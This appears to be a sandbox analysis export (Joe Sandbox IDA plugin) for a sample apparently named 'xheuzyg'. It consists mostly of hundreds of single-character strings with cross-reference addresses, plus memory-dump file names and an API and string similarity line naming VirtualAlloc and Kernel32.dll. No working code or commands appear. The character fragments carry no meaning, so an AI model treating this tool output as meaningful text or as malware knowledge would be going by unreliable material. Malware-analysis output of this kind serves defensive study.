G, xrefs: 001A8B1A
d, xrefs: 001A7D44
#, xrefs: 001AA3D2
k, xrefs: 001AAE05
D, xrefs: 001A2562
|, xrefs: 001A6390
I, xrefs: 001A44CD
C, xrefs: 001A56AF
\, xrefs: 001A8299
O, xrefs: 001A642A
}, xrefs: 001A2EDF
h, xrefs: 001ABAEA
x, xrefs: 001A5F84
VirtualAlloc, xrefs: 001ABBE0
|, xrefs: 001A8111
s, xrefs: 001A298A
\, xrefs: 001A7683
O, xrefs: 001A2F64
d, xrefs: 001A6D37
d, xrefs: 001A9C23
o, xrefs: 001A736C
-, xrefs: 001A8D5F
|, xrefs: 001A605D
B, xrefs: 001A4A06
O, xrefs: 001A4846
S, xrefs: 001A65AB
,, xrefs: 001A3602
{, xrefs: 001A2B12
d, xrefs: 001A8896
h, xrefs: 001AB823
U, xrefs: 001AAD1E
:, xrefs: 001A97A7
o, xrefs: 001A725B
O, xrefs: 001A59B1
], xrefs: 001A8873
{, xrefs: 001A944A
$, xrefs: 001A4472
e, xrefs: 001A8CF6
3, xrefs: 001A20F4
/, xrefs: 001A990C
i, xrefs: 001A2F95
d, xrefs: 001A4DEF
k, xrefs: 001A5248
y, xrefs: 001A70B0
;, xrefs: 001A4138
u, xrefs: 001A5129
S, xrefs: 001A96C7
|, xrefs: 001A4CD0
', xrefs: 001A4EBA
D, xrefs: 001A7E0F
;, xrefs: 001A9BDD
;, xrefs: 001A7246
c, xrefs: 001A413F
9, xrefs: 001A2301
I, xrefs: 001A595D
a, xrefs: 001A5FC3
p, xrefs: 001AB52F
;, xrefs: 001A42A4
9, xrefs: 001A72EE
/, xrefs: 001AB4C6
I, xrefs: 001AB782
t, xrefs: 001AA434
e, xrefs: 001A8F8F
D, xrefs: 001A841A
, xrefs: 001A4392
O, xrefs: 001AB4F0
], xrefs: 001A71BA
,, xrefs: 001A8AF7
C, xrefs: 001AB704
?, xrefs: 001A657A
9, xrefs: 001A21CD
0, xrefs: 001AB6E8
), xrefs: 001A27B5
", xrefs: 001A9F1E
C, xrefs: 001AA8BE
#, xrefs: 001A8EBD
|, xrefs: 001AB903
Q, xrefs: 001A6009
|, xrefs: 001A5AAD
\, xrefs: 001AB7EB
D, xrefs: 001A4B25
D, xrefs: 001ABA7E
\, xrefs: 001A7406
9, xrefs: 001A33A8
H, xrefs: 001AB743
t, xrefs: 001A4B9C
?, xrefs: 001A4D55
?, xrefs: 001A7008
4, xrefs: 001A4E74
P, xrefs: 001A82BC
$, xrefs: 001A8B0C
d, xrefs: 001A4C9F
O, xrefs: 001A9D96
e, xrefs: 001A3D56
Q, xrefs: 001A9DE3
+, xrefs: 001A48C4
_, xrefs: 001A50A4
3, xrefs: 001AAFE1
D, xrefs: 001A94BA
g, xrefs: 001A9B90
,, xrefs: 001A67A3
+, xrefs: 001A2F5D
R, xrefs: 001AAE2F
|, xrefs: 001A627F
%, xrefs: 001ABA0E
_, xrefs: 001AB870
e, xrefs: 001A3CFB
w, xrefs: 001A30DE
C, xrefs: 001A859B
Q, xrefs: 001A42E3
k, xrefs: 001A7B76
n, xrefs: 001A31B0
g, xrefs: 001A8E00
I, xrefs: 001AB800
;, xrefs: 001A7CF7
h, xrefs: 001A5BE1
i, xrefs: 001A3DBF
T, xrefs: 001A3D10
\, xrefs: 001A3CED
n, xrefs: 001A86B3
/, xrefs: 001A4911
{, xrefs: 001A87FC
g, xrefs: 001A2D8F
\, xrefs: 001A32F9
=, xrefs: 001AACAE
c, xrefs: 001A724D
", xrefs: 001AA63A
c, xrefs: 001A6F1A
{, xrefs: 001A2B89
d, xrefs: 001ABAD2
T, xrefs: 001A578F
h, xrefs: 001A381D
, xrefs: 001A993D
|, xrefs: 001A3808
/, xrefs: 001A4BE9
c, xrefs: 001A42AB
k, xrefs: 001A2E92
I, xrefs: 001A624E
p, xrefs: 001A8188
O, xrefs: 001A932B
{, xrefs: 001A4671
O, xrefs: 001A4A0D
t, xrefs: 001A2626
6, xrefs: 001A2E8B
Q, xrefs: 001A6891
, xrefs: 001A9A55
', xrefs: 001A3D8E
y, xrefs: 001A449C
I, xrefs: 001A9A4E
L, xrefs: 001A9D65
3, xrefs: 001A397B
|, xrefs: 001A8999
O, xrefs: 001A8E62
P, xrefs: 001AA545
#, xrefs: 001A936A
l, xrefs: 001A9420
4, xrefs: 001A29EC
|, xrefs: 001A599C
y, xrefs: 001A38E1
-, xrefs: 001AA530
., xrefs: 001AAF2B
C, xrefs: 001A6B2A
m, xrefs: 001A6010
,, xrefs: 001A68D7
P, xrefs: 001A4640
c, xrefs: 001A8690
x, xrefs: 001A8A17
l, xrefs: 001A8FCE
d, xrefs: 001A3BCE
|, xrefs: 001A51FB
c, xrefs: 001A8395
c, xrefs: 001A43BC
g, xrefs: 001A2E06
1, xrefs: 001A4F00
., xrefs: 001A6DED
i, xrefs: 001AA5F4
@, xrefs: 001A3B1F
k, xrefs: 001A4E43
D, xrefs: 001AB306
i, xrefs: 001AB6B0
D, xrefs: 001A37AD
W, xrefs: 001A8AB1
;, xrefs: 001A973E
4, xrefs: 001A48E0
C, xrefs: 001ABA56
P, xrefs: 001A8085
i, xrefs: 001AB5F3
_, xrefs: 001A92EC
c, xrefs: 001A2913
k, xrefs: 001AA30E
J, xrefs: 001A4A68
}, xrefs: 001A4D32
u, xrefs: 001A9C9A
,, xrefs: 001A3AA1
T, xrefs: 001A4265
?, xrefs: 001A6717
y, xrefs: 001A3E36
(, xrefs: 001AB3E6
T, xrefs: 001AB234
c, xrefs: 001A5BE8
a, xrefs: 001A2291
a, xrefs: 001A2DDC
k, xrefs: 001A3847
K, xrefs: 001A4D7F
;, xrefs: 001AA6E2
S, xrefs: 001AA2C1
', xrefs: 001A6852
g, xrefs: 001A23B7
_, xrefs: 001A8F5E
y, xrefs: 001A5F45
`, xrefs: 001A221A
C, xrefs: 001A437D
i, xrefs: 001A6A97
E, xrefs: 001A9B4A
{, xrefs: 001AAC61
S, xrefs: 001A8E70
=, xrefs: 001A651F
C, xrefs: 001A8540
}, xrefs: 001A9D11
|, xrefs: 001A3282
, xrefs: 001ABA12
-, xrefs: 001AB4D4
v, xrefs: 001A45C9
K, xrefs: 001A426C
\, xrefs: 001A8563
l, xrefs: 001AA2B3
S, xrefs: 001A6E17
7, xrefs: 001A5D62
D, xrefs: 001A608E
], xrefs: 001A7A49
(, xrefs: 001A2283
i, xrefs: 001A8FC0
?, xrefs: 001A2B90
k, xrefs: 001A9825
8, xrefs: 001A633C
%, xrefs: 001A26E3
0, xrefs: 001A3CA0
c, xrefs: 001A9745
+, xrefs: 001A9A94
D, xrefs: 001A62B0
G, xrefs: 001A9092
O, xrefs: 001A54B7
w, xrefs: 001A2AE8
<, xrefs: 001AA2E4
d, xrefs: 001A425E
m, xrefs: 001A2FFE
y, xrefs: 001A732D
A, xrefs: 001A4A8B
S, xrefs: 001A6FFA
i, xrefs: 001A7F7B
b, xrefs: 001AB73C
e, xrefs: 001A8F73
S, xrefs: 001A8FB9
t, xrefs: 001AADCD
d, xrefs: 001A872A
S, xrefs: 001A382B
#, xrefs: 001A539F
8, xrefs: 001A9D73
C, xrefs: 001A6D6F
3, xrefs: 001A3744
P, xrefs: 001A91F7
X, xrefs: 001A46D3
<, xrefs: 001A5295
S, xrefs: 001A26B9
_, xrefs: 001A80A8
i, xrefs: 001AACA0
!, xrefs: 001AB19A
w, xrefs: 001A5440
9, xrefs: 001A2DE3
{, xrefs: 001A6C9D
W, xrefs: 001A5995
8, xrefs: 001A2841
|, xrefs: 001ABB46
|, xrefs: 001A5677
h, xrefs: 001A8EB6
{, xrefs: 001A9D2D
], xrefs: 001A7B14
T, xrefs: 001A7AEA
d, xrefs: 001A6BCB
M, xrefs: 001A3E75
_, xrefs: 001A5CC8
%, xrefs: 001A31E1
@, xrefs: 001A81F8
|, xrefs: 001A9C38
K, xrefs: 001A88EA
?, xrefs: 001AABC7
H, xrefs: 001ABB36
0, xrefs: 001A39C8
a, xrefs: 001A56F5
u, xrefs: 001A77DA
+, xrefs: 001A3A31
#, xrefs: 001A45FA
g, xrefs: 001A86F9
O, xrefs: 001A3418
|, xrefs: 001A34FF
s, xrefs: 001AB115
d, xrefs: 001A8A02
d, xrefs: 001AB893
., xrefs: 001A7342
_, xrefs: 001A9D6C
P, xrefs: 001A5A91
[, xrefs: 001AA54C
-, xrefs: 001A9FBF
;, xrefs: 001AA338
D, xrefs: 001AAE67
C, xrefs: 001A67BF
i, xrefs: 001A73D5
+, xrefs: 001A9DB9
\, xrefs: 001A340A
Q, xrefs: 001A3DAA
', xrefs: 001A7E5C
e, xrefs: 001A30A6
9, xrefs: 001A767C
Q, xrefs: 001A88CE
1, xrefs: 001A2A94
H, xrefs: 001A8984
?, xrefs: 001A9B58
8, xrefs: 001A2D2D
<, xrefs: 001AAF55
k, xrefs: 001A4528
l, xrefs: 001A3F86
], xrefs: 001AB0AC
g, xrefs: 001A8A72
i, xrefs: 001A78CF
y, xrefs: 001AB84D
y, xrefs: 001AA9EB
y, xrefs: 001A8CBE
', xrefs: 001A5C97
;, xrefs: 001A713C
C, xrefs: 001A848A
s, xrefs: 001A46CC
`, xrefs: 001ABA6A
}, xrefs: 001A35BC
7, xrefs: 001A64EE
C, xrefs: 001A42C7
/, xrefs: 001AA8B0
-, xrefs: 001ABADE
4, xrefs: 001A8D74
d, xrefs: 001A8DDD
6, xrefs: 001A33CB
9, xrefs: 001AB9AB
7, xrefs: 001AB0BA
M, xrefs: 001A6AF2
y, xrefs: 001AB528
C, xrefs: 001A281E
D, xrefs: 001A4DB7
\, xrefs: 001A6741
c, xrefs: 001A76EC
0, xrefs: 001A812D
s, xrefs: 001A8BC2
k, xrefs: 001ABA06
S, xrefs: 001A4CE5
2, xrefs: 001AAB73
;, xrefs: 001A76E5
|, xrefs: 001A64FC
), xrefs: 001A4FA8
y, xrefs: 001A6DD8
', xrefs: 001A51ED
\, xrefs: 001A395F
x, xrefs: 001ABB7A
S, xrefs: 001A3FFD
(, xrefs: 001A51CA
+, xrefs: 001A6867
", xrefs: 001ABAE2
A, xrefs: 001A3FEF
t, xrefs: 001A6844
;, xrefs: 001A20E6
!, xrefs: 001A4CEC
=, xrefs: 001A4249
!, xrefs: 001A9E06
Q, xrefs: 001A957E
i, xrefs: 001A8777
o, xrefs: 001AA01A
E, xrefs: 001A8FEA
l, xrefs: 001A6E87
0, xrefs: 001A7086
9, xrefs: 001A7349
U, xrefs: 001A4E35
A, xrefs: 001A6AE4
_, xrefs: 001A333F
C, xrefs: 001A52DB
', xrefs: 001A30C2
*, xrefs: 001A34C0
@, xrefs: 001A3AC4
9, xrefs: 001A4019
e, xrefs: 001A29C9
[, xrefs: 001A3A4D
c, xrefs: 001AADAA
", xrefs: 001A8682
[, xrefs: 001A659D
T, xrefs: 001A5375
!, xrefs: 001A3BC0
;, xrefs: 001AB29D
G, xrefs: 001A4B64
,, xrefs: 001A3052
=, xrefs: 001A8CA9
i, xrefs: 001AA871
], xrefs: 001A4082
I, xrefs: 001A83B8
\, xrefs: 001A5130
y, xrefs: 001A97CA
o, xrefs: 001A769F
=, xrefs: 001ABA4E
x, xrefs: 001AAD02
p, xrefs: 001A5EC7
{, xrefs: 001AA55A
C, xrefs: 001A4766
{, xrefs: 001A98E9
g, xrefs: 001AA18D
<, xrefs: 001A833A
9, xrefs: 001A99AD
|, xrefs: 001A816C
T, xrefs: 001A2EB5
i, xrefs: 001AA31C
L, xrefs: 001A2E76
s, xrefs: 001A2515
$, xrefs: 001A585A
r, xrefs: 001A2D6C
x, xrefs: 001A576C
3, xrefs: 001AB9EA
b, xrefs: 001A768A
|, xrefs: 001A372F
h, xrefs: 001AB51A
c, xrefs: 001AAD64
k, xrefs: 001A6EAA
I, xrefs: 001A7691
e, xrefs: 001AA641
E, xrefs: 001AA7BB
$, xrefs: 001A5352
5, xrefs: 001A63A5
i, xrefs: 001A6F36
*, xrefs: 001AA369
h, xrefs: 001A8D82
+, xrefs: 001A658F
0, xrefs: 001AB33E
D, xrefs: 001A7A50
[, xrefs: 001A5892
C, xrefs: 001A244A
C, xrefs: 001A8ED9
y, xrefs: 001A3783
-, xrefs: 001A92D0
y, xrefs: 001A85FD
{, xrefs: 001AB281
y, xrefs: 001A951C
#, xrefs: 001A9CFC
C, xrefs: 001A3912
L, xrefs: 001A9179
w, xrefs: 001AA6B1
c, xrefs: 001A6581
\, xrefs: 001A25C4
{, xrefs: 001A9799
g, xrefs: 001A8F2D
S, xrefs: 001A8EA8
3, xrefs: 001AB162
i, xrefs: 001A720E
c, xrefs: 001A4B6B
\, xrefs: 001A5BDA
6, xrefs: 001A6F4B
S, xrefs: 001A68C2
|, xrefs: 001A3B96
$, xrefs: 001A6637
D, xrefs: 001A74D1
0, xrefs: 001A9B2E
&, xrefs: 001A5336
(, xrefs: 001AA38C
,, xrefs: 001A6A9E
,, xrefs: 001A7A42
,, xrefs: 001A531A
i, xrefs: 001AAFE8
', xrefs: 001A5026
c, xrefs: 001A208B
C, xrefs: 001AB965
D, xrefs: 001A3369
Q, xrefs: 001AAB11
\, xrefs: 001A39BA
@, xrefs: 001A961F
0, xrefs: 001A5122
_, xrefs: 001AA9AC
T, xrefs: 001A523A
i, xrefs: 001A4815
w, xrefs: 001A2649
c, xrefs: 001A923D
&, xrefs: 001AA16A
7, xrefs: 001AA943
|, xrefs: 001A771D
d, xrefs: 001A8230
l, xrefs: 001A3354
w, xrefs: 001AA7C9
?, xrefs: 001A976F
l, xrefs: 001ABAB6
g, xrefs: 001A880A
|, xrefs: 001A577A
#, xrefs: 001AB0DD
t, xrefs: 001A8604
}, xrefs: 001A2A5C
e, xrefs: 001A2340
?, xrefs: 001AB2CE
9, xrefs: 001A77CC
c, xrefs: 001A5168
d, xrefs: 001A5D70
., xrefs: 001A441E
C, xrefs: 001ABBC2
y, xrefs: 001A632E
_, xrefs: 001A3B6C
T, xrefs: 001A35C3
o, xrefs: 001AA8FD
T, xrefs: 001A6319
], xrefs: 001A7F4A
4, xrefs: 001A4F07
g, xrefs: 001A62B7
0, xrefs: 001A4D39
g, xrefs: 001AA958
R, xrefs: 001A28A3
a, xrefs: 001A9650
A, xrefs: 001AA599
Q, xrefs: 001AAC76
D, xrefs: 001A57AB
S, xrefs: 001A4399
$, xrefs: 001A2E84
S, xrefs: 001A40B3
[, xrefs: 001A5398
i, xrefs: 001A2D57
Q, xrefs: 001A9833
9, xrefs: 001A6DF4
l, xrefs: 001ABA82
a, xrefs: 001A86BA
|, xrefs: 001A3840
d, xrefs: 001AB12A
$, xrefs: 001AB9B2
_, xrefs: 001A3791
Y, xrefs: 001A23FD
#, xrefs: 001A2AF6
E, xrefs: 001A96AB
;, xrefs: 001A43B5
h, xrefs: 001A8E46
T, xrefs: 001A786D
k, xrefs: 001A5CBA
X, xrefs: 001A4751
#, xrefs: 001A77E8
x, xrefs: 001AAE83
w, xrefs: 001A30F3
C, xrefs: 001A581B
7, xrefs: 001A6064
l, xrefs: 001AB097
, xrefs: 001AAD4F
@, xrefs: 001A5597
D, xrefs: 001A5B0F
D, xrefs: 001AA7A6
9, xrefs: 001A9014
4, xrefs: 001A2730
H, xrefs: 001A2B82
g, xrefs: 001A5E18
X, xrefs: 001A28F0
(, xrefs: 001A355A
', xrefs: 001AB9F8
`, xrefs: 001A9133
,, xrefs: 001AB1FC
:, xrefs: 001A4D8D
q, xrefs: 001AACDF
E, xrefs: 001AB7BA
|, xrefs: 001AAE91
;, xrefs: 001A452F
+, xrefs: 001A3F94
C, xrefs: 001A7A57
m, xrefs: 001A223D
l, xrefs: 001A9E1B
i, xrefs: 001A7F35
), xrefs: 001A805B
, xrefs: 001A8015
|, xrefs: 001AB38B
o, xrefs: 001A79D2
;, xrefs: 001A3B9D
`, xrefs: 001A5FFB
O, xrefs: 001A7EA9
9, xrefs: 001AA2AC
/, xrefs: 001A602C
\, xrefs: 001A29BB
x, xrefs: 001AAA85
], xrefs: 001A9F41
7, xrefs: 001A5DE7
[, xrefs: 001A8BB4
z, xrefs: 001A36D4
i, xrefs: 001AAAEE
S, xrefs: 001A7D60
{, xrefs: 001A3F55
k, xrefs: 001A7A11
9, xrefs: 001A6B1C
i, xrefs: 001A9DC7
H, xrefs: 001A4F69
", xrefs: 001A6EC6
6, xrefs: 001A7223
w, xrefs: 001A4C3D
), xrefs: 001A591E
H, xrefs: 001AA2F2
i, xrefs: 001A7F90
#, xrefs: 001A6ACF
+, xrefs: 001A8A2C
{, xrefs: 001A3A5B
+, xrefs: 001A95F5
w, xrefs: 001AB575
/, xrefs: 001A2474
,, xrefs: 001A6E2C
;, xrefs: 001A3083
d, xrefs: 001A5CDD
T, xrefs: 001A7B45
i, xrefs: 001A6BA8
T, xrefs: 001A709B
i, xrefs: 001AB043
{, xrefs: 001A9F4F
+, xrefs: 001A2CCB
&, xrefs: 001ABA66
|, xrefs: 001A87E0
+, xrefs: 001A9642
}, xrefs: 001A283A
v, xrefs: 001A2117
(, xrefs: 001A9C15
', xrefs: 001A89A0
H, xrefs: 001AAB18
S, xrefs: 001A9B66
i, xrefs: 001A2AA2
{, xrefs: 001A83F0
2, xrefs: 001A76D0
;, xrefs: 001AA4E3
Y, xrefs: 001A8B4B
i, xrefs: 001A8E15
o, xrefs: 001A9706
_, xrefs: 001A2F3A
9, xrefs: 001A4598
w, xrefs: 001A8149
g, xrefs: 001A97D8
g, xrefs: 001A57B2
}, xrefs: 001AB797
/, xrefs: 001AB854
b, xrefs: 001AB942
l, xrefs: 001A8150
I, xrefs: 001A8DAC
y, xrefs: 001AA4F1
c, xrefs: 001A3F63
W, xrefs: 001A6A0B
-, xrefs: 001A90ED
t, xrefs: 001A3450
], xrefs: 001A3A77
+, xrefs: 001A5424
\, xrefs: 001A5589
x, xrefs: 001A254D
p, xrefs: 001A5BB0
C, xrefs: 001A8DC8
S, xrefs: 001A85A9
k, xrefs: 001A924B
Q, xrefs: 001A78EB
S, xrefs: 001A9125
\, xrefs: 001A351B
1, xrefs: 001AB8A8
C, xrefs: 001A66AE
$, xrefs: 001A69A9
G, xrefs: 001A83C6
c, xrefs: 001A9967
C, xrefs: 001A22AD
}, xrefs: 001A311D
<, xrefs: 001A9363
5, xrefs: 001A77F6
D, xrefs: 001A513E
|, xrefs: 001A3CDF
W, xrefs: 001AB686
|, xrefs: 001A7698
;, xrefs: 001A3028
?, xrefs: 001A8F18
X, xrefs: 001ABB42
a, xrefs: 001A8C7F
0, xrefs: 001A56D2
e, xrefs: 001AB8A1
|, xrefs: 001A8914
}, xrefs: 001A2B97
7, xrefs: 001A59D4
, xrefs: 001A4C59
9, xrefs: 001AA94A
h, xrefs: 001AAC92
^, xrefs: 001A6725
C, xrefs: 001A6908
;, xrefs: 001A8A87
8, xrefs: 001A4694
u, xrefs: 001A9109
`, xrefs: 001A62E8
I, xrefs: 001A8E07
o, xrefs: 001A64E7
g, xrefs: 001A8961
>, xrefs: 001A2CD2
\, xrefs: 001A896F
|, xrefs: 001A8E0E
1, xrefs: 001AB44F
C, xrefs: 001A315C
*, xrefs: 001A4115
", xrefs: 001A2084
+, xrefs: 001A8C4E
4, xrefs: 001A93E1
O, xrefs: 001A6526
+, xrefs: 001AACCA
T, xrefs: 001A40F9
y, xrefs: 001A8C63
+, xrefs: 001A9ECA
d, xrefs: 001A51D8
f, xrefs: 001A63BA
', xrefs: 001A37FA
G, xrefs: 001AA8E1
d, xrefs: 001A461D
,, xrefs: 001A89D8
B, xrefs: 001A9D26
C, xrefs: 001A436F
@, xrefs: 001A5401
a, xrefs: 001A9AEF
O, xrefs: 001AAF5C
!, xrefs: 001A49C7
S, xrefs: 001A61BB
;, xrefs: 001A31EF
, xrefs: 001A8302
?, xrefs: 001A9603
C, xrefs: 001A6DCA
!, xrefs: 001A35F4
+, xrefs: 001A9D8F
{, xrefs: 001AAA3F
\, xrefs: 001AB4B8
{, xrefs: 001AAABD
{, xrefs: 001A2EFB
T, xrefs: 001A420A
m, xrefs: 001A7040
(, xrefs: 001A927C
C, xrefs: 001AA1FD
/, xrefs: 001A9FCD
S, xrefs: 001A427A
', xrefs: 001A55BA
y, xrefs: 001A743E
H, xrefs: 001AA4A4
c, xrefs: 001A5416
L, xrefs: 001A55F2
temp_unzipped, xrefs: 001ABCF0
D, xrefs: 001A5B39
|, xrefs: 001A5359
:, xrefs: 001A2809
}, xrefs: 001A809A
{, xrefs: 001A294B
*, xrefs: 001AB035
\, xrefs: 001A56E0
d, xrefs: 001A6382
@, xrefs: 001A9ABE
_, xrefs: 001A8070
4, xrefs: 001A834F
%, xrefs: 001A2A78
m, xrefs: 001ABB8A
I, xrefs: 001AA966
D, xrefs: 001AB8FC
a, xrefs: 001A4E51
?, xrefs: 001AA46C
T, xrefs: 001A3B49
y, xrefs: 001A8DD6
E, xrefs: 001A8C78
s, xrefs: 001A22F3
C, xrefs: 001A9817
}, xrefs: 001A5948
h, xrefs: 001A5E5E
X, xrefs: 001A9187
), xrefs: 001AA25F
M, xrefs: 001A4203
S, xrefs: 001A72B6
D, xrefs: 001A7A26
}, xrefs: 001A8EF5
;, xrefs: 001A6469
i, xrefs: 001A32C8
W, xrefs: 001A3B2D
', xrefs: 001A77FD
,, xrefs: 001A6BAF
d, xrefs: 001A882D
|, xrefs: 001A59A3
0, xrefs: 001A618A
<, xrefs: 001A93A2
5, xrefs: 001A6E02
I, xrefs: 001A2A71
;, xrefs: 001A3BE3
d, xrefs: 001A928A
+, xrefs: 001A3AE7
D, xrefs: 001A682F
<, xrefs: 001A8E3F
8, xrefs: 001A4A61
U, xrefs: 001A9DAB
d, xrefs: 001A4965
g, xrefs: 001A5693
d, xrefs: 001A4345
,, xrefs: 001A6F3D
t, xrefs: 001AB17E
A, xrefs: 001A5E3B
i, xrefs: 001A2490
T, xrefs: 001A7701
a, xrefs: 001AB647
$, xrefs: 001A2DFF
\, xrefs: 001A6240
w, xrefs: 001AA84E
S, xrefs: 001A83E2
d, xrefs: 001AB402
O, xrefs: 001A9C85
4, xrefs: 001A538A
D, xrefs: 001A6C49
|, xrefs: 001A70B7
Y, xrefs: 001A28AA
H, xrefs: 001A5902
T, xrefs: 001A6D0D
1, xrefs: 001A9F5D
t, xrefs: 001A5367
T, xrefs: 001A5CE4
A, xrefs: 001A259A
7, xrefs: 001A414D
$, xrefs: 001A629B
(, xrefs: 001A66C3
C, xrefs: 001A9FDB
Q, xrefs: 001AA894
$, xrefs: 001A56EE
w, xrefs: 001A8BF3
;, xrefs: 001AA40A
J, xrefs: 001ABB86
x, xrefs: 001A6216
;, xrefs: 001A77BE
T, xrefs: 001A70F6
I, xrefs: 001AA194
0, xrefs: 001A356F
k, xrefs: 001A3BEA
9, xrefs: 001A7E4E
4, xrefs: 001A4885
C, xrefs: 001A4E82
d, xrefs: 001ABA36
Q, xrefs: 001A2FB1
,, xrefs: 001A386A
}, xrefs: 001A7EBE
H, xrefs: 001A3801
`, xrefs: 001A3457
+, xrefs: 001A66A0
Q, xrefs: 001A25BD
g, xrefs: 001A2AD3
[, xrefs: 001A4A99
i, xrefs: 001A492D
W, xrefs: 001AA243
+, xrefs: 001A3ED0
d, xrefs: 001A99DE
Q, xrefs: 001A6D30
;, xrefs: 001A55D6
D, xrefs: 001A60E9
d, xrefs: 001A4FC4
Q, xrefs: 001A6AB3
Y, xrefs: 001A2156
I, xrefs: 001A30E5
Q, xrefs: 001A6BC4
d, xrefs: 001AA39A
i, xrefs: 001AA6AA
T, xrefs: 001ABB56
T, xrefs: 001A7BFB
$, xrefs: 001A6304
U, xrefs: 001A8715
5, xrefs: 001A5F4C
g, xrefs: 001A4B2C
i, xrefs: 001ABABA
i, xrefs: 001A98CD
C, xrefs: 001A3AD9

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Window$AddressAllocAllocateCodeConsoleEnumHeapLibraryLoadPagesProcShowSystemVirtual
String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$Kernel32.dll$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$V$VirtualAlloc$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$